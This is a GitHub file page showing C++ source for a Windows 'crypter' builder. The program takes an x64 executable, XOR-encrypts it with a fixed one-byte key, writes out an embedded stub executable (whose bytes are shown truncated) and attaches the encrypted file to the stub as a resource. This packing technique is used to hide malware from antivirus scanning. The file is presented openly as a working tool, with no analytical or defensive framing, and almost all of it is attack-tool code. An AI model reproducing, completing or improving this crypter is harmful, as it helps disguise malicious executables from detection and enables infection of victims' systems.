-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathcrypter.cpp
154 lines (129 loc) · 4.82 KB
/
crypter.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
#include <iostream>
#include <windows.h>
#include <fstream>
using namespace std;
// raw data of our compiled stub
unsigned char rawData[2462687] = { 0x4D, 0x5A, 0x90, ...};
int main(int argc, char* argv[]) {
HANDLE hCon = GetStdHandle( STD_OUTPUT_HANDLE ); // link to console to change colors
cout << "Checking input arguments... ";
if (argc < 2) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Start this program with arguments." << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
const char *resFile = argv[1];
// read input file
cout << "Reading input file... ";
FILE *fileptr;
char *fileBuff;
long filelen;
fileptr = fopen(resFile, "rb"); // Open the file in binary mode
fseek(fileptr, 0, SEEK_END); // jump to the end of the file
filelen = ftell(fileptr); // get the current byte offset in the file
rewind(fileptr); // jump back to the beginning of the file
fileBuff = (char *)malloc(filelen * sizeof(char)); // alloc memory for the file
fread(fileBuff, filelen, 1, fileptr); // read in the entire file
fclose(fileptr);
if (fileBuff == NULL) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not read input file." << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
// check if input file is a valid x64 PE
cout << "Validate input file as x64 PE... ";
IMAGE_DOS_HEADER* _dosHeader = (PIMAGE_DOS_HEADER) fileBuff;
IMAGE_NT_HEADERS64* _ntHeader = (PIMAGE_NT_HEADERS64)(DWORD64(fileBuff) + _dosHeader->e_lfanew);
bool is64 = _ntHeader->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64;
if (!is64) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error. Input file is not a valid x64 PE" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
// XOR encrypt the resource data
cout << "Encrypting data... ";
char key = 'k'; // same key as in the compiled Stub
char encrypted[filelen];
for (int i = 0; i < filelen; i++)
encrypted[i] = fileBuff[i] ^ key;
if (encrypted == NULL) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not encrypt the data" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
// write Stub
cout << "Writing stub... ";
fstream bin ("Stub.exe",ios :: out | ios :: binary);
if (!bin.write(reinterpret_cast<const char *>(rawData), sizeof(rawData))) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not write the stub to disk" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
bin.close();
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
// add encrypted data as resource to the stub
cout << "Write encrypted resource to stub... ";
HANDLE hUpdateRes;
BOOL result;
hUpdateRes = BeginUpdateResource("Stub.exe", FALSE);
if (hUpdateRes == NULL)
{
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not open file for writing" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
result = UpdateResource(hUpdateRes, // update resource handle
"BIN", // resource ID
MAKEINTRESOURCE(132), // resource name
NULL,
encrypted, // ptr to encrypted resource
filelen); // size of resource
if (result == FALSE)
{
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not add resource" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
// write changes and then close
if (!EndUpdateResource(hUpdateRes, FALSE))
{
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not write changes to file" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}